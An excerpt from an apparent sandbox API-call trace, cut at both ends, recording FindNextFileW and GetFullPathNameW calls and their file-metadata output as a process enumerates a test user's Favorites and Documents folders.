lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0255.450] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0255.456] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", lpFilePart=0x0) returned 0x57 [0255.458] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.458] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0255.458] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x0, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0255.458] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0255.458] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0255.458] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.458] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0255.458] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x0, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0255.458] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0255.458] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0255.460] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.460] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0255.460] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0255.460] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.461] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0255.461] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0255.461] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda424400, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda424400, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.461] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1295e80, ftCreationTime.dwHighDateTime=0x1d597b9, ftLastAccessTime.dwLowDateTime=0xcbf6980, ftLastAccessTime.dwHighDateTime=0x1d5ceae, ftLastWriteTime.dwLowDateTime=0xcbf6980, ftLastWriteTime.dwHighDateTime=0x1d5ceae, nFileSizeHigh=0x0, nFileSizeLow=0xd007, dwReserved0=0x0, dwReserved1=0x0, cFileName="1fUWNzah9eDSoo9.docx", cAlternateFileName="1FUWNZ~1.DOC")) returned 1 [0255.461] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fcd9a30, ftCreationTime.dwHighDateTime=0x1d5adc1, ftLastAccessTime.dwLowDateTime=0xe8342d30, ftLastAccessTime.dwHighDateTime=0x1d592e4, ftLastWriteTime.dwLowDateTime=0xe8342d30, ftLastWriteTime.dwHighDateTime=0x1d592e4, nFileSizeHigh=0x0, nFileSizeLow=0xd244, dwReserved0=0x0, dwReserved1=0x0, cFileName="4KwM.xlsx", cAlternateFileName="4KWM~1.XLS")) returned 1 [0255.461] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec732e60, ftCreationTime.dwHighDateTime=0x1d5a788, ftLastAccessTime.dwLowDateTime=0x17222390, ftLastAccessTime.dwHighDateTime=0x1d5cb16, ftLastWriteTime.dwLowDateTime=0x17222390, ftLastWriteTime.dwHighDateTime=0x1d5cb16, nFileSizeHigh=0x0, nFileSizeLow=0x35d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4TIpwdkjwo9LNE.xlsx", cAlternateFileName="4TIPWD~1.XLS")) returned 1 [0255.461] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c851b0, ftCreationTime.dwHighDateTime=0x1d55e4b, ftLastAccessTime.dwLowDateTime=0x125e1e20, ftLastAccessTime.dwHighDateTime=0x1d564d4, ftLastWriteTime.dwLowDateTime=0x125e1e20, ftLastWriteTime.dwHighDateTime=0x1d564d4, nFileSizeHigh=0x0, nFileSizeLow=0x10021, dwReserved0=0x0, dwReserved1=0x0, cFileName="5dKx88Jk -aA- 3njE.xlsx", cAlternateFileName="5DKX88~1.XLS")) returned 1 [0255.461] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd623e2e0, ftCreationTime.dwHighDateTime=0x1d5e7c4, ftLastAccessTime.dwLowDateTime=0xfc241aa0, ftLastAccessTime.dwHighDateTime=0x1d55e8a, ftLastWriteTime.dwLowDateTime=0xfc241aa0, ftLastWriteTime.dwHighDateTime=0x1d55e8a, nFileSizeHigh=0x0, nFileSizeLow=0x12a57, dwReserved0=0x0, dwReserved1=0x0, cFileName="7WoYYB3aZvCLN1pJ.xlsx", cAlternateFileName="7WOYYB~1.XLS")) returned 1 [0255.461] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70c59720, ftCreationTime.dwHighDateTime=0x1d57fc5, ftLastAccessTime.dwLowDateTime=0xe1b08300, ftLastAccessTime.dwHighDateTime=0x1d57507, ftLastWriteTime.dwLowDateTime=0xe1b08300, ftLastWriteTime.dwHighDateTime=0x1d57507, nFileSizeHigh=0x0, nFileSizeLow=0x18197, dwReserved0=0x0, dwReserved1=0x0, cFileName="8dtTXcdZNIX0EkpZ0Bd.pptx", cAlternateFileName="8DTTXC~1.PPT")) returned 1 [0255.461] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee1dd330, ftCreationTime.dwHighDateTime=0x1d5e628, ftLastAccessTime.dwLowDateTime=0x9fdb67d0, ftLastAccessTime.dwHighDateTime=0x1d5ba1a, ftLastWriteTime.dwLowDateTime=0x9fdb67d0, ftLastWriteTime.dwHighDateTime=0x1d5ba1a, nFileSizeHigh=0x0, nFileSizeLow=0xe2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bJ tIzZSNluSYKA.docx", cAlternateFileName="BJTIZZ~1.DOC")) returned 1 [0255.461] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa450c880, ftCreationTime.dwHighDateTime=0x1d5dc36, ftLastAccessTime.dwLowDateTime=0x6bdd7f20, ftLastAccessTime.dwHighDateTime=0x1d5e76c, ftLastWriteTime.dwLowDateTime=0x6bdd7f20, ftLastWriteTime.dwHighDateTime=0x1d5e76c, nFileSizeHigh=0x0, nFileSizeLow=0x376d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ckaZojHAXod2.docx", cAlternateFileName="CKAZOJ~1.DOC")) returned 1 [0255.461] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0255.461] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12ba9f80, ftCreationTime.dwHighDateTime=0x1d5e709, ftLastAccessTime.dwLowDateTime=0x2c4cca40, ftLastAccessTime.dwHighDateTime=0x1d5e6a5, ftLastWriteTime.dwLowDateTime=0x2c4cca40, ftLastWriteTime.dwHighDateTime=0x1d5e6a5, nFileSizeHigh=0x0, nFileSizeLow=0x13e50, dwReserved0=0x0, dwReserved1=0x0, cFileName="ee6Hfjbp_ b.rtf", cAlternateFileName="EE6HFJ~1.RTF")) returned 1 [0255.462] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96ff0a70, ftCreationTime.dwHighDateTime=0x1d5e695, ftLastAccessTime.dwLowDateTime=0xcca58910, ftLastAccessTime.dwHighDateTime=0x1d5a8e7, ftLastWriteTime.dwLowDateTime=0xcca58910, ftLastWriteTime.dwHighDateTime=0x1d5a8e7, nFileSizeHigh=0x0, nFileSizeLow=0xc70b, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQ0aEApyX.pptx", cAlternateFileName="EQ0AEA~1.PPT")) returned 1 [0255.462] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x594875f0, ftCreationTime.dwHighDateTime=0x1d5b72d, ftLastAccessTime.dwLowDateTime=0x88cc9dd0, ftLastAccessTime.dwHighDateTime=0x1d5a0ba, ftLastWriteTime.dwLowDateTime=0x88cc9dd0, ftLastWriteTime.dwHighDateTime=0x1d5a0ba, nFileSizeHigh=0x0, nFileSizeLow=0x80cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="g5mq.docx", cAlternateFileName="G5MQ~1.DOC")) returned 1 [0255.462] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x732e310, ftCreationTime.dwHighDateTime=0x1d59552, ftLastAccessTime.dwLowDateTime=0x473bfd60, ftLastAccessTime.dwHighDateTime=0x1d5b925, ftLastWriteTime.dwLowDateTime=0x473bfd60, ftLastWriteTime.dwHighDateTime=0x1d5b925, nFileSizeHigh=0x0, nFileSizeLow=0xf4b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="ID7sZ-DbPR.pptx", cAlternateFileName="ID7SZ-~1.PPT")) returned 1 [0255.462] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9df7f50, ftCreationTime.dwHighDateTime=0x1d5db9e, ftLastAccessTime.dwLowDateTime=0xce4ad520, ftLastAccessTime.dwHighDateTime=0x1d5ceb9, ftLastWriteTime.dwLowDateTime=0xce4ad520, ftLastWriteTime.dwHighDateTime=0x1d5ceb9, nFileSizeHigh=0x0, nFileSizeLow=0x6456, dwReserved0=0x0, dwReserved1=0x0, cFileName="MGuoFKDzVd7lgyb_t.pptx", cAlternateFileName="MGUOFK~1.PPT")) returned 1 [0255.462] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ac6df90, ftCreationTime.dwHighDateTime=0x1d5e5b8, ftLastAccessTime.dwLowDateTime=0xd52bdd90, ftLastAccessTime.dwHighDateTime=0x1d5e56f, ftLastWriteTime.dwLowDateTime=0xd52bdd90, ftLastWriteTime.dwHighDateTime=0x1d5e56f, nFileSizeHigh=0x0, nFileSizeLow=0x13559, dwReserved0=0x0, dwReserved1=0x0, cFileName="msAyTmF2yMxw3d92t.pptx", cAlternateFileName="MSAYTM~1.PPT")) returned 1 [0255.462] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0255.462] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0255.462] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0255.462] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0255.462] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b61a510, ftCreationTime.dwHighDateTime=0x1d57c38, ftLastAccessTime.dwLowDateTime=0x9edec400, ftLastAccessTime.dwHighDateTime=0x1d5c4bd, ftLastWriteTime.dwLowDateTime=0x9edec400, ftLastWriteTime.dwHighDateTime=0x1d5c4bd, nFileSizeHigh=0x0, nFileSizeLow=0x202c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NyqimoSd7l319bg3F.docx", cAlternateFileName="NYQIMO~1.DOC")) returned 1 [0255.462] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0255.462] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0522620, ftCreationTime.dwHighDateTime=0x1d5e7da, ftLastAccessTime.dwLowDateTime=0x9e6de2c0, ftLastAccessTime.dwHighDateTime=0x1d5df35, ftLastWriteTime.dwLowDateTime=0x9e6de2c0, ftLastWriteTime.dwHighDateTime=0x1d5df35, nFileSizeHigh=0x0, nFileSizeLow=0x18e82, dwReserved0=0x0, dwReserved1=0x0, cFileName="RB7vKe4dGF-QVWZ3.xls", cAlternateFileName="RB7VKE~1.XLS")) returned 1 [0255.463] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14540ff0, ftCreationTime.dwHighDateTime=0x1d5e242, ftLastAccessTime.dwLowDateTime=0xb8b09c80, ftLastAccessTime.dwHighDateTime=0x1d5e008, ftLastWriteTime.dwLowDateTime=0xb8b09c80, ftLastWriteTime.dwHighDateTime=0x1d5e008, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TbcTIVyGuBBLe7", cAlternateFileName="TBCTIV~1")) returned 1 [0255.463] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1350870, ftCreationTime.dwHighDateTime=0x1d59f3a, ftLastAccessTime.dwLowDateTime=0xb8d15240, ftLastAccessTime.dwHighDateTime=0x1d571db, ftLastWriteTime.dwLowDateTime=0xb8d15240, ftLastWriteTime.dwHighDateTime=0x1d571db, nFileSizeHigh=0x0, nFileSizeLow=0x12a3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="UNiICeYoMbvR-uhvCAQg.pptx", cAlternateFileName="UNIICE~1.PPT")) returned 1 [0255.463] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37663d30, ftCreationTime.dwHighDateTime=0x1d58723, ftLastAccessTime.dwLowDateTime=0xc831b110, ftLastAccessTime.dwHighDateTime=0x1d5db64, ftLastWriteTime.dwLowDateTime=0xc831b110, ftLastWriteTime.dwHighDateTime=0x1d5db64, nFileSizeHigh=0x0, nFileSizeLow=0x11f7e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ys1suZFVNZW7SmZSMrC1.xlsx", cAlternateFileName="YS1SUZ~1.XLS")) returned 1 [0255.463] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52513470, ftCreationTime.dwHighDateTime=0x1d5b9f4, ftLastAccessTime.dwLowDateTime=0xad1cacd0, ftLastAccessTime.dwHighDateTime=0x1d567ca, ftLastWriteTime.dwLowDateTime=0xad1cacd0, ftLastWriteTime.dwHighDateTime=0x1d567ca, nFileSizeHigh=0x0, nFileSizeLow=0xea8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="_sXODdA_.docx", cAlternateFileName="_SXODD~1.DOC")) returned 1 [0255.463] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52513470, ftCreationTime.dwHighDateTime=0x1d5b9f4, ftLastAccessTime.dwLowDateTime=0xad1cacd0, ftLastAccessTime.dwHighDateTime=0x1d567ca, 